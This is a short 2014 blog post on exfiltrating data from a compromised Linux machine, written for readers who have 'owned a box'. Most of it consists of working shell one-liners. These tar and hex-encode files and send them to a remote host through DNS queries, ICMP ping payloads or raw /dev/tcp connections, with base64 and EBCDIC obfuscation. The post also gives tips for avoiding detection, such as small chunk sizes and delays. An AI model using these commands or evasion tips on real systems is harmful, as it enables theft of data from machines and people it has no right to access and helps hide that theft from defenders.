Thursday, February 27, 2014

Data exfiltration on Linux

Been a while since my last blog post so I thought id throw up a quickie that everyone will enjoy.

Data exfiltration is really neat and there are many ways to do it, especially on linux.  I will only cover a few to make this a real short post.
Ill be using tarballs for data compression because thats the only way to do it.... not really, I just like using tarballs.

So you owned a box, or a few boxes on a network and now you want to get some of the loot off or move the data to a central location to then exfiltrate all it.  How are you going to do it?  Well here are a few techniques for linux.

Exfiltrate a tarball via DNS:
Data exfiltration via DNS on linux: tar zcf - <file(s)> | xxd -p | while read line; do host $line.<target> <remotehost>; done
now this command creates the tarball and then we read it line by line and send it to our remote host using DNS requests.  Just using this alone will probably set off some alarms when dns requests start spewing out of the box off to your server.

So to make it less suspicious and prevent us being blocked with large hostnames so we can use  -c in the xxd command to specify the number of bytes we will send each time.

Data exfiltration via DNS on linux: tar zcf - <file(s)> | xxd -p -c 8 | while read line; do host $line.<target> <remotehost>; done
This sends the tarball converted to hex 8 bytes at a time.  Also adding a simple sleep statement can spread out the DNS requests over a period of time and prevent alerts because of blasting DNS requests out.

Using PING:
Using ping is pretty much the same command as using DNS except the data is sent via ICMP requests. Here is what the commnd looks like.

tar zcf - <file> | xxd -p -c 16 | while read line; do ping -p $line -c 1 <remotehost>; done
This sends each ICMP packet only once and keeps them small only 16bytes of data per packet, you can change this as needed, some network security devices look at ICMP packet sizes to prevent this kind of exfiltration.

 Just sending the tarball over the network:

tar zcf - <file(s)> > /dev/tcp/<remotehost>443
This will send the tarball unobfuscated over the network on port 443.

But what if we want to obfuscate it?

Simple, we can add a base64 to the tarball or to ebcdic or ibm(ebcdic alternative)
 tar zcf - <file(s)> | base 64 > /dev/tcp/<remotehost>443
Or combine base64 and ebcdic/ibm
tar zcf - <file(s)> | base64 | dd conv=ebcdic > /dev/tcp/<remotehost>443
tar zcf - <file(s)> | base64 | dd conv=ibm > /dev/tcp/<remotehost>443 

So thats it for this quick post, keep in mind there are many ways to exfiltrate data. I showed you how to do it without SSH or CURL. Using ssh and curl to exfiltrate data is easy and ill leave it to you all to look into it.

(Windows data exfiltration may be coming soon... who knows)